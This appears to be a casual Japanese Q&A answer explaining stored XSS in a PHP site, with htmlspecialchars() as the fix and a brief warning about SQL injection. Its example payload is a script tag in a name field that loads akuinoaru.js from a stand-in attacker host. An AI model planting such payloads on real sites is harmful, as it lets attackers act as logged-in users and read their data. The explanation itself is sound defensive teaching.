これはXSS？

入力したデータをそのまま保存して、表示に使うとするよ。 自分の入力した名前を公開することができて、他の人が閲覧できるとするよ。 1) Ａさんは akuinoaru-user.com サーバの / に akuinoaru.js を作ったよ。 2) Ａさんが名前の欄に次の行を入力したよ。 <script type="text/javascript" src="http://akuinoaru-user.com/akuinoaru.js"></script> 3) Ｂさんが、質問者さんのサイトにログインしたよ。 4) Ｂさんが、Ａさんの名前をみたよ。 5) すると、次の行がＢさんのブラウザで実行されるよ。 <script type="text/javascript" src="http://akuinoaru-user.com/akuinoaru.js"></script> これがどういうことかというと。 Ｂさんが質問者さんのサイトにログイン中にしか表示されないはずの情報が、Ａさんは見ることができるよ。 Ｂさんが質問者さんのサイトにログイン中にしかできないはずの操作が、Ａさんにできてしまうよ。 これが XSS の脆弱性。 もちろん、サイトの管理者さんがログイン中にＡさんの名前をみたら、 サイトの管理者さんしか見ることができない情報をＡさんはみることができて、 サイトの管理者さんしかできないはずの操作をＡさんができることになるよ。 怖いね。 対策例の一つだけど、 入力データを表示するときは htmlspecialchars(入力データ) を使うことだよ。 これで、Ａさんの名前を表示しても akuinoaru.jp は実行されないで、次の行が名前として表示されるようになるよ。 <script type="text/javascript" src="http://akuinoaru-user.com/akuinoaru.js"></script> XSS よりもっと怖いのが、入力データの表示ではなくて、ほかの目的で使うときだよ。 例えば、入力データを保存するために、データベースにデータを送るよね。 このときに SQL 文を作るけど、入力データをそのまま SQL 文に含めると「SQLインジェクション」の脆弱性の出来上がり！ これは、PHP が使うデータベースのユーザ権限でできるデータベース操作を、誰でも、いつでも、何でも、自由にできてしまう脆弱性だよ。 恐ろしいね。 つまり、ユーザが入力したデータを使って何かを処理するときは、データにどのような文字列が入っていたとしても、その処理に合わせて、データを加工してから使うようにしなければ、脆弱性になるということだよ。 データ表示のときは htmlspecialchars() をつかったけど、ほかの処理はそれぞれ加工の仕方が変わるから、どんなときでもこれをすれば大丈夫という便利なものは無いんだ。 精進あるのみだね。